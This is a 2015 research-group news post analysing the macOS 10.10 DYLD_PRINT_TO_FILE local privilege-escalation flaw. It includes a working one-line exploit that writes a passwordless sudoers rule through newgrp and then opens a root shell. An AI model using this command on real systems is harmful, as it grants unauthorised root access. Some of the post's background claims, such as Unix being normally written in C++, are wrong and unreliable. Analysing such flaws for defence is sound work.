Research Team Analyse New Apple Mac Privileged Access Exploit

23/07/2015

News image

The Cyber Academy research team have been analysing a new Mac OS X vulnerability which allows for Privileged Access to the latest version of their operating system.

So many people think that the flaws that are appearing are legacy ones that have been around when computer security was not a major problem. The Unix kernel is now showing its age, especially in the methods that were used to created the basic functionality of the system, and in the sloppiness of the developers.

So there is a bit of shock that the latest one relates to an environment variable which was introduced in the latest version of the Mac OS (10.10): DYLD_PRINT_TO_FILE.

The problem is caused by Mac OS suffering from all the problems that Uni has, including:

  • Data piping. In Unix, programs often pipe data from the output of one program into another. This leaves the data open for compromise.
  • C++. Unix operating systems normally use C++ as their core development language, and thus suffer from all the usual things that are caused by C++, including buffer overruns (where the data runs into memory that is not allocated for it) and buffer underruns (where the data does not fill the space allocated to it, and is then read back making the assumption that the data had filled it).
  • Environmental variables and scripting. These are global variables which are set by the operating system and are used by many system programs. Code can often be injected into the variable when they are used, often with administrator rights.

The code basically allows for privileged root access to the system, and does this by using the DYLD_PRINT_TO_FILE environmental variable to write the following line into the /etc/sudoers:


ALL ALL=(ALL) NOPASSWD: ALL


which is a file which defines all super users on the system, and, in this case, gives superuser access to a user. A basic script is thus:

echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su

In this case, the privileged program newgroup is run to allow super user access to the /etc/sudoers file. Then a "sudo su" is executed to provide access to a command-line shell, with root-level privileges.

The full article is:

Here

 
[Read More]

Associated people

William Buchanan
Director of CDCS
w.buchanan@napier.ac.uk
+44 131 455 2759
Dynamic Forensics Evaluation and Training (DFET)
Dynamic Forensics Evaluation and Training (DFET) will create new training methods/techniques to support judicial authorities, law enforcement agencies and associated stakeholders in the fight against cybercrime through the development of a virtual (cloud-based) cybercrime training environment to...
Cyber-Security
Electronic information now plays a vital role in almost every aspect of our daily lives. So the need for a secure and trustworthy online infrastructure is more important than ever. without it, not only the growth of the internet but our personal interactions and the economy itself could be at risk.

Resources